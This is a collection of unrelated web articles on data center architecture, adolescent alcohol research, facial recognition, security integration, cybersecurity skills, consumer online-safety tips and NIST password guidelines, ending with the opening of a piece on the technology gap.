Data center architecture is the structured layout designed to support a data center’s computing, storage, and networking resources. It specifies how a multitude of components like servers, storage systems, and networking devices are organized and interconnected within a facility. The architecture is critical as it determines the data center’s efficiency, flexibility, and scalability, ensuring it can accommodate current and future IT demands. The constant evolution of computing technologies, increasing demand for resources, and the need for reliable, secure data storage and management necessitate a well-thought-out data center design.
A key component in data center design is the physical infrastructure, which encompasses space planning, power distribution, cooling systems, and physical security mechanisms. These elements support the core hardware and software systems, enabling the execution of a variety of applications and services that enterprises rely on. On top of the foundational infrastructure, data center network architecture interconnects the array of devices and facilitates communication between data storage solutions and computing resources, thereby forming the backbone of the data center’s capability to process and manage large volumes of data.
- Effective data center architecture must integrate servers, storage, and networking to support applications and services.
- The design and infrastructure of a data center are crucial for ensuring scalability, efficiency, and security.
- Continuous management and adoption of new technologies are necessary for maintaining operability and supporting business continuity.
Design Principles and Standards
When architects design data centers, they must adhere to defined principles and standards to ensure operational efficiency and reliability. Standards set by entities like the Uptime Institute provide a framework for scalability, redundancy, fault tolerance, and energy efficiency.
The Uptime Institute’s Tier Classification System is a critical standard in data center design. The system ranges from Tier I to Tier IV, categorizing facilities based on redundancy and fault tolerance. A Tier I center has a single path for power and cooling and no redundant components, offering limited protection against operational interruptions. Higher tiers improve on these aspects, culminating in Tier IV, which offers full fault tolerance and 96 hours of power outage protection.
- Scalability: Data centers must be designed to accommodate growth without compromising existing operations.
- Redundancy: Essential to ensure that backup systems are in place, such as power supplies or cooling systems, to maintain operations during component failures.
- Fault Tolerance: The architecture must tolerate and isolate faults to prevent them from affecting the entire system.
- Energy Efficiency: Critical in reducing operational costs and environmental impact. Implementing energy-efficient systems and designs is paramount.
Designers incorporate these principles as follows:
- Tier Level | Scalability | Redundancy | Fault Tolerance | Energy Efficiency
- — | — | — | — | —
- Tier I | Limited | N/A | N/A | Standard
- Tier II | Moderate | Partial | N/A | Improved
- Tier III | High | N+1 | N+1 | High Efficiency
- Tier IV | Highest | 2N+1 | 2(N+1) | Highest Efficiency
In summary, companies must balance cost against the level of uptime required. While higher tiers offer greater protection and capability, they also demand a larger investment. Therefore, architects prioritize requirements to align the data center design with the organization’s objectives while complying with established standards for a robust and effective data environment.
The physical infrastructure of a data center underpins its functionality, providing a robust and secure environment for critical IT equipment such as servers and data storage devices.
Building and Space
A data center’s building must accommodate a variety of spatial needs. Construction of these facilities focuses on optimizing the space to support the scale of IT operations, which may include thousands of physical servers. Efficient use of space is critical, taking into consideration future growth and expansion potential.
Power Supply and Cooling Systems
Power is the lifeblood of a data center, with a redundant supply being crucial. Facilities typically employ a combination of uninterruptible power supplies (UPS) and backup generators to ensure a consistent power flow. Cooling systems, essential for dissipating heat, include ventilation and fans. Sophisticated cooling technologies ensure that equipment operates within safe temperature ranges, thus avoiding overheating.
Security and Safety
Data centers prioritize both security and safety of their physical premises. They employ robust firewalls and controlled access points to secure the data within. Additionally, facilities are equipped with fire suppression systems and protocols to ensure safety against physical threats. These security measures are designed to safeguard against both external and internal risks.
Core Data Center Network Architecture
In the realm of data center network architecture, the core component serves as the pivotal point of connectivity and functionality, facilitating efficient data flow and providing robust support for the demanding network infrastructure.
Modern Networking Layout
Data center network (DCN) architecture has evolved to meet the increasing demands for scalability and performance in contemporary IT environments. The network fabric within modern data centers is designed to provide a resilient and flexible framework for data traffic. Crucial to the fabric’s efficiency are core layer switches, which interconnect with aggregate layer switches and the access layer, forming a hierarchical structure to manage the flow of information efficiently.
Components and Topology
- Access Layer: At the foundation of the structure, one finds the access layer, typically composed of access layer switches. These switches connect directly to servers, handling incoming and outgoing server traffic.
- Aggregate Layer: Also known as the distribution layer, the aggregate layer acts as a mediator, granting an effective communication bridge between the access and core layers. Aggregate layer switches help to consolidate data flow from multiple access switches before it is routed to the core layer.
- Core Layer: The core layer, at the apex of the data center network topology, is designed to be highly redundant and efficient, equipped with core layer switches that possess robust processing capabilities. These switches are pivotal in interconnecting different segments of the network, ensuring a smooth and uninterrupted flow of data. The layer employs high-performance routers and utilizes a mesh of cables and switches to sustain the high volume of cross-network traffic.
In constructing a DCN, the quality and capability of physical components such as routers, switches, and cables are fundamental, as they dictate the network’s overall performance and reliability. The choices made in network design and component selection are central to establishing a core architecture that meets present and future demands.
Data Storage Solutions
When designing a data center, choosing the right data storage solution is critical. Data storage in modern data centers has evolved to accommodate diversified needs, such as big data analysis, high-velocity file sharing, and robust storage systems that ensure data availability and integrity.
Cloud Storage and Object Stores: Solutions like Azure Blob Storage offer massively scalable object storage for text and binary data. This aligns well with big data storage requirements due to its scalability and the ability to handle large volumes of unstructured data.
On-Premises Storage: Many organizations opt for on-premises storage architectures to maintain control over their sensitive data. The key to effective on-premises storage lies in the right mix of hardware and virtualization, ensuring optimal usage of compute, storage, and networking resources.
Hybrid Arrays: Hybrid storage arrays combine both flash and hard disk drives to balance cost with performance, allowing for faster access where needed and cost-effective storage for less critical data.
- File Sharing Systems: Companies often deploy file sharing protocols within their storage solutions to facilitate collaboration and ease of data access. This allows for sharing large files within the data center network securely and efficiently.
Software-Defined Infrastructure (SDI): This approach abstracts the storage resources, pooling them to serve users more effectively. Through virtualization, resources can be allocated dynamically, leading to improved efficiency and reduced unused capacity.
In considering which data storage technology to adopt, factors such as data size, access speed, and application priority dictate the choice. It is imperative for a data center to align its storage technology with its overall goals and the specific demands of the data it holds.
Data centers house the critical computing resources that support a vast array of applications and workloads. These resources are meticulously managed and often deployed across various environments, including on-premises, public cloud, and at the edge, to ensure efficient and resilient operations.
Modern data centers deploy a multitude of servers, each designed to handle specific tasks and applications. Effective server management is paramount, involving the organization, alignment of resources, and ensuring that servers operate at optimal performance levels. In practice, this often includes:
- Monitoring system health and performance.
- Maintaining software updates and security patches.
- Allocating computing resources like CPU, memory, and storage to balance loads and maximize efficiency.
On-premises servers are managed directly within the facility, while multicloud and edge computing extend this management to include remote and distributed resources.
Virtualization and Cloud Solutions
Virtualization plays a critical role in data center architecture, abstracting hardware and creating multiple simulated environments or dedicated resources from a single physical setup. This technique enhances utilization rates and allows for:
- Efficient resource distribution through virtual machines (VMs).
- Rapid scalability to meet fluctuating demand.
- Isolation of workloads for increased security.
Cloud Computing has emerged as a transformative force, offering public cloud services that scale on demand and bring forth economic benefits. Data centers often employ a multicloud strategy to leverage the best services from different cloud providers, while cloud solutions like Containerization cater to the needs of modern applications, promoting agility and continuity.
By incorporating these sophisticated computing strategies, data centers deliver robust and versatile platforms for the ever-evolving landscape of digital services and requirements.
Network Services and Applications
The architecture of data centers incorporates an array of network services and applications to ensure efficient data throughput and low latency, vital for a spectrum of uses ranging from social media to machine learning.
Access and Distribution
In any data center, network access is the gateway through which users and devices connect to various applications. It optimizes user experience by enabling seamless entry to the network’s resources. The distribution layer acts as an intermediary, streamlining data flow between access and core layers, improving application performance and enhancing security measures.
- Access Layer Features:
- Provides connectivity for devices and end-users
- Implements policies for network access control
- Distribution Layer Functions:
- Aggregates data from access switches
- Routes and filters packets, balancing loads
Application Performance Management
Application Performance Management (APM) is a suite of analytics and management tools that monitor the performance of applications housed within a data center. They focus on two main aspects: throughput and latency which are crucial for maintaining an efficient operational environment.
- Throughput Maximization:
- Ensures data is transferred at high speeds
- Sustains the demands of high-volume applications like social media and email
- Latency Reduction:
- Decreases the delay in data transmission
- Critical for real-time applications, AI, and machine learning algorithms
APM tools not only provide visibility into the performance of applications but also help mitigate issues, ensuring consistent and reliable application delivery. By leveraging these tools, data centers can enhance user experience and the performance of advanced applications.
Operational management in data center architecture is crucial for businesses seeking reliability and high availability of services. It encompasses the organization and oversight of infrastructure, ensuring that systems run smoothly and meet specified service level agreements (SLAs).
Automation has emerged as a pivotal element within modern data centers to tackle complex processes that surpass human capabilities. It streamlines workflows, enables rapid scalability, and assists with real-time troubleshooting, significantly improving efficiency and reducing the potential for human error.
Effective operational management also involves continuous monitoring of both physical and virtual infrastructure elements. This real-time observation is integral to maintaining the operational integrity of the data center and providing insight for proactive maintenance and dynamic management responses.
Key Component | Description |
Management | Involves strategic planning, resource allocation, and administering policies. |
Organization | Ensures optimal structuring of teams and technologies for maximum efficiency. |
Service Level Agreements (SLAs) | Formalized agreements that help guarantee uptime, performance, and response times. |
Troubleshooting | Identifies, diagnoses, and resolves issues swiftly to minimize the impact on services. |
Operational management serves as the backbone of business stability, with a direct impact on the availability of services. As data centers become larger and more complex, the approaches to managing such environments must also evolve with the same precision and efficiency.
Disaster Recovery and Business Continuity
In the context of data center architecture, disaster recovery (DR) and business continuity (BC) are crucial strategies to ensure operational resilience and regulatory compliance. Disaster recovery involves restoring IT and data center operations following a disruptive event. It outlines the processes to recover lost data and resume applications.
Resiliency plays a significant role in DR, referring to the data center’s ability to adapt and respond to risks, from natural disasters to cyber-attacks. Resilient data center architectures integrate redundancy and fault tolerance to mitigate potential disruptions.
Backup generators are a common physical safeguard in data centers. They provide an alternate power supply to maintain critical functions in the event of a power outage. The integration of these generators is a physical manifestation of business continuity principles.
Here are essential components in disaster recovery and business continuity planning:
- Objective Formulation:
- Defining Recovery Time Objectives (RTO)
- Establishing Recovery Point Objectives (RPO)
- Technology Tools:
- Utilizing replication technologies like Hitachi TrueCopy and Hitachi Universal Replicator
- Architecture Types:
- Hybrid constructs that balance cost with resilience
Business continuity covers the entirety of operations and aims to maintain business functions during and after a disaster. It goes beyond data recovery, focusing on the continuous operation of the entire organization.
- DR is reactive, dealing primarily with data and system recovery.
- BC is proactive, encompassing a broader scope of sustained operations.
The synergy between disaster recovery and business continuity planning ensures that data centers can withstand and quickly recover from disruptions, thus maintaining uninterrupted business operations.
Frequently Asked Questions
Data center architecture is critical for successful IT operations, involving intricate design and detailed responsibilities. These FAQs address the core aspects, roles, designs, types, construction processes, and design standards central to the field.
What are the primary components involved in data center infrastructure?
The primary components of data center infrastructure typically include servers, storage systems, networking devices, power supplies, cooling systems, and physical racks. These elements work in unison to support the processing, storage, and dissemination of data.
What roles and responsibilities define a data center architect?
A data center architect is responsible for designing the layout and systems of a data center. They must ensure that the infrastructure is scalable, reliable, and efficient while meeting the data and computing requirements of the organization.
How is modern data center architecture typically designed?
Modern data center architecture is often designed with virtualization and modularity in mind to improve scalability and utilization. Emphasis is placed on energy efficiency, reducing the facility’s carbon footprint, and accommodating future technology integrations.
What are the key types of data center architectures currently in use?
Currently, data center architectures include traditional on-premises centers, colocation facilities, cloud data centers, edge computing centers, and centers utilizing modular or containerized designs. Each serves different needs and scales according to demand.
Can you describe the standard process for constructing a data center?
Constructing a data center commonly starts with thorough planning of the layout and infrastructure, followed by site selection, calculating power and cooling requirements, and ensuring compliance with industry standards. The actual construction phase carefully adheres to the predefined architectural design and planning.
What are the generally accepted design standards for data centers?
Design standards for data centers are guided by industry best practices and certifications such as those from Uptime Institute’s Tier Standard and ANSI/TIA-942. These standards dictate the specifications for redundancy, fault tolerance, and overall reliability.
Last Updated on February 12, 2024 by Josh Mahan | <urn:uuid:2dea1108-b946-4364-bd52-282ae2fc85da> | CC-MAIN-2024-38 | https://cc-techgroup.com/data-center-architecture/ | 2024-09-13T22:39:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00687.warc.gz | en | 0.907277 | 3,345 | 3.0625 | 3 |
Under 18, no alcohol.
In spite of this slogan, adolescents still have access to alcohol.
But how harmful is that one beer for the adolescent brain?
Research, including in Leiden, may provide the answer.
Over 43 per cent of young people between the ages of 14 and 18 have drunk alcohol at some point in time.
The adolescent brain is still developing and the consequences of moderate alcohol consumption are as yet not fully known. Dr Sabine Peters, from Leiden University, who is one of the researchers in this project, comments:
‘We think that the adolescent brain is more sensitive than the adult brain to alcohol, simply bcause the adolescent brain is still developing.
The connections between brain cells are not as robust as in adults, which means they are more easily disrupted.’
Existing brain scans
Leiden University is working with research groups at Erasmus MC, the Vrije Universiteit and UMC Utrecht.
These four institutions each analyse their own data, taken from existing brain scans of some 1,400 adolescents.
The research follows the adolescents over a number of years, during which two points in time are compared:
a point when the young people have never drunk alcohol and a point after they have.
These scans make it possible to map the consequences of alcohol use.
The researchers are also studying the effect of alcohol use on adolescents’ cognitive abilities.
The large-scale research project is taking place at the request of the Brain Foundation of the Netherlands.
‘We want to use this research to show the possible risk factors and make people more aware of them,’ commented Dr Loes van Herten, Head of the Healthy Brain department at the Brain Foundation.
‘Surprisingly enough, little research has been done on the effect of alcohol on the adolescent brain,’ Peters comments.
‘Most of the research has been done on animals, but it doesn’t really translate well into humans.’
Peters explains that the research focuses directly on replication.
‘We first look per research group at the effects of alcohol use on the adolescent brain.
We then look at whether we find the same outcomes with other datasets where some other factor is being measured.
To date, very little research has been done on this question, and certainly not in a replication study with several different large-scale datasets, so this is exciting research.’
The data that Leiden University is making available comes from the Brain Time study, a large-scale longitudinal study in which three hundred adolescents have taken part.
These young participants underwent MRI scans at two-year intervals, so that researchers could map the development of the brain. | <urn:uuid:0ee1f3e2-0f54-4793-a015-e3520d9b9247> | CC-MAIN-2024-38 | https://debuglies.com/2017/05/12/harmful-is-alcohol-for-the-adolescent-brain/ | 2024-09-13T23:06:23Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00687.warc.gz | en | 0.949187 | 559 | 3.3125 | 3 |
The term facial recognition is used to describe the process in which a computer application verifies a person’s identity. The software is used to detect the location of a specific face in a particular photo or video, and it’s wise enough to ignore other surrounding objects such as buildings, animals, cars or trees.
Now, simply from a person’s face, it is possible to tell people’s gender, their approximate age, whether they use glasses or not, and even how they are feeling. So there is no doubt that a human face is a rich source of very valuable information.
Human beings are able to process faces very quickly. It only takes us less than one second to recognize someone and even to determine how they are feeling. In the case of the software, however, it takes a more complex but very accurate process.
In other words, this process starts by examining the picture or video, then it determines if there are any faces in that frame by distinguishing them from the background. This procedure is done despite poor illumination, camera distance or changes in the orientation of the face.
Difference between facial detection and facial recognition
You might be wondering… “But if the software detects a face, it is because it was recognized”. Well, that is the idea, more or less.
Unfortunately, the terms facial detection and facial recognition have been misused, especially by the media, who often have a hard time distinguishing the two processes. As mentioned above, the idea is that in order to have facial recognition, first of all there must be facial detection.
Facial detection is the process in which the software determines, through algorithms, whether there are human faces in a picture or video. It does not determine a person’s identity; it only tells whether there are faces in there. For that reason, face detection does not store any information or detail about the detected person, it’s completely anonymous. So if the software detects a face in a particular picture, and this same face is detected again later on, it will not recognize that face as being the same person, since it will just provide a detection of a human face in a certain picture or frame. However, it will be able to keep some demographic information, such as gender or age of the person, being useful for demographic statistics. In conclusion, face detection by itself does not recognize an individual.
Moreover, facial recognition identifies automatically. This means that the software makes a positive identification of a person’s face, in a photo or video, against an existing database of faces. This recognition is possible because the face has been previously enrolled into a database of subjects. In order for face recognition to provide a successful recognition, the face needs to be enrolled following some quality criteria, like frontality, illumination or face size (in pixels).
Next, the software will determine unique facial key points used to identify the specific person enrolled into the database. In the next place, the system will use these key points to compare them against the information from the new picture or video. And then, if the face has a high level of confidence it will mean that there is a ‘match’, so the concrete face will then have been ‘recognized’.
There are many details that are necessary to recognize a person’s identity or characteristics, details that are undetectable to the human eye. But now, thanks to the incredible new technology developments, we are able to build hi-tech software that’s even capable of recognizing multiple faces in changeable and crowded environments, such as airports, train stations, shopping malls, sport stadiums…
Just as Herta’s CEO, Javier Rodríguez says “the human eye is the most perfect machine that exists. Although a machine may have in memory millions of faces that human beings could not recognize”.
Do you have any idea about how you could use facial recognition? Get in touch with us!
Written by: Laura Blanc Pedregal | <urn:uuid:11267145-198e-4b94-a438-351df159d534> | CC-MAIN-2024-38 | https://hertasecurity.com/facial-recognition-the-explanation/ | 2024-09-15T02:45:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651614.9/warc/CC-MAIN-20240915020916-20240915050916-00587.warc.gz | en | 0.950541 | 825 | 3.609375 | 4 |
More and more companies and organizations are starting to realize the amount of risks their physical faculties or information systems could face in today’s age of threats. System integration has a history of being adopted lately, although it is starting to become much more encompassing of a term. Usually, security system integration involves hooking up access control systems, CCTV systems, and alarm systems, but these days, we’re starting to incorporate more technologies into the arsenal. If you have heard of the term system integration, especially in the context of security technology, it is crucial to understand what the drawbacks and the benefits might be. Read on to learn more!
Improved Comprehensive Security
Integrated approaches can create a much-needed redundancy intended to increase the overall strength of an entire system in the event that one aspect of the security system is bypassed. If somebody were to duplicate the access control keycard, it might not be enough to get them into a secured parking lot if that lot is protected through a driver camera system. Any isolated system is subject to being entirely circumvented, but when it is combined together, it makes it a lot more challenging to bypass these security technologies. This is why system integration is so important.
Integrated systems also make spaces a lot more functional and more straightforward for those who should have full access. The benefit of these kinds of technologies is that they are usually designed around usability, instead of creating many mechanisms that a person has to be responsible for, like different keycards and passwords, they count on credentials that are essential to a user, like fingerprints, facial features, and knowledge to security questions. While keycards and passcodes might be utilized, developers of systems meant to be integrated are fully aware that carrying around various cards or remembering passwords is not efficient or practical.
Drawbacks and Difficulties
Looking back at time, a lot of security systems have been proprietary – or forcing you to buy each element of your system from the exact same vendor. However, this is changing vastly in recent years, as many suppliers in the physical security industry know all about the importance of open or standard systems for security technology.
Groundbreaking Technologies with Gatekeeper
Gatekeeper Security’s suite of intelligent optical technologies provides security personnel with the tool to detect today’s threats. Our systems help those in the energy, transportation, commercial, and government sectors protect their people and their valuables by detecting threats in time to act. From automatic under vehicle inspection systems, automatic license plate reader systems, to on the move automatic vehicle occupant identifier, we offer full 360-degree vehicle scanning to ensure any threat is found. Throughout 376 countries around the globe, Gatekeeper Security’s technology is trusted to help protect critical infrastructure. Follow us on Facebook and LinkedIn for updates about our technology and company. | <urn:uuid:1d4195fd-b6d9-409e-9f6c-9a3a66a9c750> | CC-MAIN-2024-38 | https://www.gatekeepersecurity.com/blog/security-integration-concept-adopted-globally/ | 2024-09-16T08:35:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651682.69/warc/CC-MAIN-20240916080220-20240916110220-00487.warc.gz | en | 0.951325 | 567 | 2.5625 | 3 |
In the dynamic and ever-evolving landscape of cybersecurity, professionals need a diverse skills set to stay ahead of malicious actors. This exploration delves into the essential cybersecurity skills that empower professionals to navigate the digital battlefield, protecting organizations and individuals from an array of cyber threats.
Technical Proficiency: The Foundation of Cyber Defense
Technical proficiency forms the cornerstone of cybersecurity skills. Professionals must be adept in areas such as network security, encryption, penetration testing, and vulnerability assessment. Mastery of tools and technologies is essential to identify, mitigate, and prevent cyber threats effectively.
Incident Response and Forensics: Rapid and Informed Action
In the event of a cyber incident, the ability to respond swiftly and conduct digital forensics is crucial. Cybersecurity professionals need skills in incident response to mitigate damage, identify the source of the breach, and develop strategies to prevent future occurrences.
Security Architecture and Design: Building Fortified Systems
Designing secure systems and architectures is a proactive measure in cybersecurity. Professionals must possess skills in creating robust security frameworks, implementing access controls, and ensuring that security is ingrained in the development lifecycle of applications and infrastructure.
Threat Intelligence Analysis: Staying One Step Ahead
Understanding the threat landscape is paramount in cybersecurity. Professionals need skills in threat intelligence analysis to interpret patterns, identify emerging threats, and formulate proactive strategies to fortify defenses. This skill enables organizations to stay one step ahead of potential cyber adversaries.
Coding and Scripting: Crafting Secure Solutions
A strong foundation in coding and scripting languages is invaluable for cybersecurity professionals. Whether it’s reviewing source code for vulnerabilities or crafting scripts for automation, coding skills contribute to creating and maintaining secure software and systems.
Soft Skills: Communication and Collaboration
In addition to technical acumen, cybersecurity professionals require strong soft skills. Effective communication and collaboration are essential when conveying complex security concepts to non-technical stakeholders, collaborating with cross-functional teams, and fostering a culture of security awareness within organizations.
Adaptability and Continuous Learning: Staying Ahead of Trends
The cybersecurity landscape evolves rapidly, requiring professionals to be adaptable and committed to continuous learning. Keeping abreast of emerging threats, new technologies, and evolving security best practices is crucial to maintaining effective digital defense strategies.
Ethical Hacking: Proactive Defense through Simulation
Ethical hacking, or penetration testing, involves simulating cyberattacks to identify vulnerabilities before malicious actors exploit them. Cybersecurity professionals with skills in ethical hacking play a proactive role in securing systems by identifying and patching potential weaknesses.
Cryptography: Safeguarding Information in Transit
A profound understanding of cryptography is essential for cybersecurity professionals. From encrypting sensitive data to securing communication channels, cryptography is a fundamental skill. Professionals must grasp both symmetric and asymmetric encryption methods, as well as the application of cryptographic protocols to ensure secure communication and data protection.
Risk Management: Balancing Security and Business Objectives
Effective cybersecurity is not just about blocking every potential threat; it’s about managing risk. Professionals need skills in risk management to assess potential vulnerabilities, prioritize threats based on their impact, and develop strategies that align with broader business objectives. This skill ensures that security measures contribute positively to the overall success of an organization.
Conclusion: Empowering Cyber Warriors for a Secure Future
In conclusion, the field of cybersecurity demands a diverse skill set that blends technical expertise with soft skills and a commitment to continuous learning. Cybersecurity professionals, armed with these essential skills, become the frontline defenders in the digital realm, safeguarding organizations and individuals from evolving cyber threats. | <urn:uuid:3d19f806-0677-4f0a-8be6-af5749703101> | CC-MAIN-2024-38 | https://garage4hackers.com/cybersecurity-skills-for-todays-professionals/ | 2024-09-12T18:53:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651491.39/warc/CC-MAIN-20240912174615-20240912204615-00887.warc.gz | en | 0.895999 | 726 | 3.0625 | 3 |
This week is National Consumer Protection week and as while there are many threats to our user data and personal information, there are also a multitude of ways we can protect ourselves. Some examples of best practices are:
- Using a credit card rather than debit card - this prevents you from needing to enter a pin in public where people can visually capture your input.
- Using Apple or Google Pay - these applications store your credit card so you do not need to physically access the card to use it.
- Using a unique PIN for debit cards - not reusing this pin for unlocking cell phones or as voicemail codes, etc.
- Never sharing passwords, account access, and credit or debit cards with others.
There are other, more advanced threats to the security of your devices. It is important to be aware of them as this increases your ability to protect yourself from them.
It's Consumer Protection Week - Here's 4 Ways to be Safer Online
There are far more than four approaches to staying safe in an online environment, but these ideas can be implemented immediately. Most importantly, remember to slow down when you are feeling pressured. Hackers often use scare tactics to appeal to your emotional, and less rational, feelings to get you to act without thinking. If you stop and think about what is going on before reacting, you will be less likely to make a big mistake.
Reduce the amount you rely upon search
Search became the answer for all our woes years ago. Can't remember where you stored a file? Forgot the name of the file or when it was created? Can't figure out where a setting went? Not to worry, search to the rescue! The problem with using search this way is that it allows us to pay less attention to what we are doing. We rely upon, or anticipate using search later, which makes us lazier as we are confident search will provide what we need.
Where this can hurt us is relying upon search to find company websites. It would be challenging to find someone who has never experienced clicking on a website result only to find it was not what we were looking for. This is not a big deal when searching for a specific item not tied to a company. However, for banking and other websites that would need to collect personal information, this is much riskier. If you imagine the drive home from work and how easy it can be to forget part of the trip, this is what can happen when we use search all the time - we forget to stop and consider what we are clicking.
The fix: Bookmark the correct site instead of searching and absently clicking on results.
Don't click or call the number in popup warnings
Popup warnings are different from ads and website interactions like subscribing to a newsletter or signing up for a coupon. By contrast, these are the warnings claiming your computer has been infected and you need to call (enter the company here) so they can fix your computer. Oftentimes they pretend to be Microsoft or other reputable companies to encourage people to call. Unfortunately, these popups use shady scare tactics to convince people to let them connect remotely when you otherwise would not.
What is important to know is that getting a popup that you have been infected does not guarantee you have been infected. In other words, a popup can claim anything but it does not make it true. People who call are encouraged to allow the company to connect remotely so they can "clean their computer". At this point typically one of two things happens. The user either overpays for software to remove malware from their computer that likely never existed in the first place, or worse case, this is when the real malware is installed.
The fix: Close the web browser. If the popup returns, reset the browser to factory settings or if necessary, uninstall the browser and reinstall it.
Most importantly, do not ever let someone remotely connect to your computer unless you know who they are and trust them. Remote control software was created for a great purpose - to allow technicians to help people without physically being in the same location. It can also be used to run updates and install software when users are not actively on their computers, as is the most common case with businesses. Unfortunately, those settings that make it great for remote tech support also make it dangerous when misused.
Look for more than the lock symbol next to a website
This is important because we have all been taught to look for the lock symbol next to a website to be confident the site is encrypting our data before transferring it. Unfortunately, it is not enough for a website to have this symbol. The symbol means a security certificate has been purchased for the domain. However, it does not mean it is a trustworthy website or that it is safe to enter your information.
As an example, Wells Fargo's website is wellsfargo.com. If you were unknowingly redirected to wellsfargo.online.com and someone made this fake site look just like Wells Fargo's website, you might be tricked into entering your credentials. In situations like this, the lock symbol does not protect you because you are submitting your information directly to the hackers. While the lock does show the site is secure, if you are using the wrong site, your information is still at risk.
The fix: Always be sure to check the URL before entering your credentials. This is especially important when using search or clicking on links in email, which I recommend doing cautiously. It is easy to be redirected without realizing it. Check the URL in its entirety provides the greatest likelihood you will never fall for this trick.
Go directly to a site rather than clicking on a link in an email
Last but not least, clicking on links in emails can be very risky. There are examples of emails with safe links including, but not limited to:
- Newsletters you have subscribed to and trust
- Emails received after clicking a link on a website to reset a password or recover an account
- Deals or product information emails from companies you trust and that you actively signed up to receive
Aside from emails you are expecting or have consented to receive, use caution clicking on links. This is especially true of threatening emails or emails using scare tactics like you need to change your password because there was a data breach, etc. Keep in mind, a link's text can be anything and the destination link might not match the text.
A hyperlink contains two parts: the text describing the link and the actual link destination. The text may look like this: "Check out our sale now!" and appear to have come from a company you subscribe to, but the hyperlink could be pointing to a nefarious website hoping to gather your personal data.
The fix: Hover over the link to see where the link is really going. Instead of using the link, go to the site directly or call the company to see if there really is a problem with your account. The more we notify companies of scams like this, the better they can inform other customers and the safer we will all be.
During the National Consumer Protection Week, and every week, it is important to do your best to protect yourself. Going directly to websites rather than using search, checking to make sure you are at the correct website before entering your credentials, refusing to click on ads using scare tactics and using caution with links in emails are ways you can protect yourself from common attacks schemes happening all the time.
As always, knowing what form an attack may take will better help you identify the risks so you can avoid them rather than becoming a victim! | <urn:uuid:6625b939-9f14-42f0-a506-f2514a4ac310> | CC-MAIN-2024-38 | https://blogs.eyonic.com/its-consumer-protection-week-heres-4-ways-to-be-safer-online/ | 2024-09-20T06:30:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652138.47/warc/CC-MAIN-20240920054402-20240920084402-00287.warc.gz | en | 0.956594 | 1,536 | 2.671875 | 3 |
Passwords are the most widely used form of authentication across the globe and serve as the first line of defense to critical systems, applications, and data. In the past decade, however, they have attracted the ire of IT security experts for their ineffectiveness to stop hackers.
According to the 2018 Credential Spill Report, 2.3 billion credentials were stolen in 2017. To safeguard passwords from attacks, the National Institute of Standards and Technology (NIST) publishes guidelines that cover the security requirements of passwords in detail. Though intended for federal agencies, these guidelines can help all types of organizations implement strong password policies without affecting the end-user experience.
The recently published NIST Special Publication 800-63B report defines the standards for authentication and identity life cycle management. Section 5.1.1 of this report covers the guidelines related to password security and talks about what can be done to ensure optimal security.
NIST password guidelines: The dos and don’ts
What you should do:
Require longer passwords (up to 64 characters); password length should be set at a minimum of 8 characters.
Permit the usage of printable ASCII characters, Unicode characters, and spaces.
Blacklist commonly used words, dictionary words, and breached passwords, such as password1, qwerty123, etc.
Restrict the use of repetitive or sequential characters, such as aaaa1234, 123456, etc.
Offer guidance, such as a password strength meter, to help users choose a strong password.
Enforce account lockouts after a certain number of failed authentication attempts.
Permit the usage of the paste functionality while entering passwords.
Enforce two-factor authentication (2FA), which adds an additional layer of authentication in addition to passwords.
What you should not do:
Enable password complexity requirements, i.e, requiring a password to have a certain number of uppercase character, lowercase character, special character, and digits.
Enable password expiration.
Use security questions that involve personal information of the user.
Use hints to help users remember their passwords.
Some of these guidelines are vastly different from what have been traditionally considered password security best practices. For example, the NIST recommends that password complexity requirements, which have been regarded as one of the most important settings to ensure stronger passwords, be disabled.
According to NIST, when complexity rules are enforced, users respond in a predictable manner and choose common passwords, such as password1!, or write them down somewhere. Password expiration, another setting considered to be a security best practice, has also been advised against in these guidelines. Microsoft, too, has recently announced that the password expiration settings in Windows will be phased out in the near feature.
Enforcing NIST guidelines in Active Directory (AD)
For most organizations, AD serves as the identity store where users are authenticated before they’re allowed to access network resources. Unfortunately, implementing NIST guidelines using the domain password policy settings in AD is not possible, as it lacks many of the capabilities recommended by the NIST. For example, there’s no way to blacklist dictionary words or display a password strength meter to help users choose a strong password.
How ADSelfService Plus can help with NIST compliance
ManageEngine ADSelfService Plus is an integrated Active Directory self-service password management and single sign-on solution. The Password Policy Enforcer feature in ADSelfService Plus supports advanced password policy settings including dictionary rule, pattern checker, an option to enforce the use of Unicode characters, an option to restrict the use of repetitive characters, and more.
You can configure a file containing a list of all the leaked passwords in ADSelfService Plus, and prevent users from using those passwords. The solution also displays a password strength meter when users change or reset their domain password using its self-service portal.
Fig 1. Password policy settings available in ADSelfService Plus
Additionally, you can create multiple password policies with different levels of complexities, and apply them granularly based on the OUs and groups in AD. This way, you can ensure that users with higher privileges use strong passwords, while other users have a relatively lenient password complexity to abide by. ADSelfService Plus also supports 2FA for Windows (both local and remote desktop logons) and cloud applications through single sign-on.
The cyberthreat landscape is continuously evolving, so even NIST guidelines can’t be considered the be-all and end-all solution. Although these guidelines provide a basic starting point, you should consider the security requirements of your business, IT compliance laws (for example, PCI DSS has its own set of password guidelines), and other factors before devising your password policies.
Most importantly, it’s time to jump on the 2FA bandwagon and enable it for all systems and applications in your organization. Whatever your requirements are, a tool like ADSelfService Plus can help you make the transition towards better security. Get started right away by downloading a free, 30-day trial of ADSelfService Plus. | <urn:uuid:4af131eb-8a7c-4763-a2e8-d9ad5b9a0bee> | CC-MAIN-2024-38 | https://blogs.manageengine.com/active-directory/adselfservice-plus/2019/07/16/complying-with-nist-password-guidelines.html | 2024-09-09T08:26:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00387.warc.gz | en | 0.905442 | 1,038 | 3.5 | 4 |
In the age of rapid technological advancement, the term “technology gap” has gained prominence as a concept highlighting disparities in access, utilization, and proficiency with technology. This article aims to elucidate the multifaceted nature of the Define Technology Gap and its far-reaching implications in today’s interconnected world.
Defining the Technology Gap
